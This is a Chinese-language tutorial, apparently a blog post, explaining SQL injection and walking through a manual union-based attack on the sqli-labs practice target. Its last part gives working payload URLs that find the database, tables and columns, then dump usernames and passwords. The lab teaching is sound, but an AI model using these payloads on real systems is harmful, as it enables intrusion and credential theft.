网络安全——SQL注入漏洞

一、SQL注入概述

1、SQL注入漏洞

       攻击者利用Web应用程序对用户输入验证上的疏忽，在输入的数据中包含对某些数据库系统有特殊意义的符号或命令，让攻击者有机会直接对后台数据库系统下达指令，进而实现对后台数据库乃至整个应用系统的入侵。

2、SQL注入原理

      服务端没有过滤用户输入的恶意数据，直接把用户输入的数据当中SQL语句执行，攻击者从而获得数据库中的数据，影响数据库安全和平台安全

实现SQL注入的两个条件：

用户能够控制输入

原本程序要执行的SQL语句，拼接了用户输入的恶意数据

3、SQL注入过程

 4、SQL注入带来的危害

5、SQL注入示例

 

 --空格是注释的意思，注释掉后面的语句

二、SQL注入分类

1、按照注入点类型分类

（1）数字型（整型）注入

 例：sqli-labs的第一关，使用火狐浏览器的hackbar

 

 在靶机地址后加?id=8 and 1=2，没有反应

（2）字符型注入

 字符串注入测试方法

 

（3）搜索型注入

2、按照注入技术（执行效果）分类

三、SQL注入漏洞形成的原因

1、动态字符串构建引起

 2、后台存在的问题

后台无过滤或者编码用户数据

数据库可以拼接用户传递的恶意代码

3、错误处理不当

详细的内部错误信息显示给用户或者攻击者

错误信息可以直接给攻击者提供下一步攻击帮助

4、不安全的数据库配置

四、寻找SQL注入点

1、GET方法

一种请求服务器的HTTP方法，使用该方法时，信息包含在URL中

点击一个链接时，一般会使用该方法

 2、POST方法

POST是一种向Web服务器发送信息的HTTP方法，数据无法在URL中看到，可以抓包，也可以用Hackbar中的POST，POST可以发送字节大的数据

 3、其他注入点

Cookie、Host、User-Agent

4、关于注入点的总结

只要后台接收前台输入的数据，而且没有对数据进行过滤，最后直接进入到数据库，从而构成威胁

五、SQL注入过程

1、手工注入

 利用sqli-labs靶机的第二关

（1）判断是否存在注入点

 

 

 （2）、判断字段长度（也就是表中数据有多少列）

利用order by 语法，如下图，为什么-- 后面不是空格，是+呢，因为用+代替空格，以免空格被后面隐藏的固定语句吃掉，使--不起作用

 

 

 

 到了4就报错，说明有3个字段

（3）、判断字段回显位置

由上一步我们知道有3个字段，我们可以利用union语法，如下图

and 1=2 是与条件，使前面的语句失效，执行union后面的查询，从而判断出回显位置

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,3--+

（4）判断数据库信息和查询数据库名

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,database()--+

 （5）查询数据表

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

（6）查找数据库表中所有字段以及字段值

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

 

 （7）猜解账号密码

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+

 

 

以此类推，可通过修改limit后面的参数，将users表中存放的所有用户信息全部暴露出来。

---

这篇文章就写到这里了！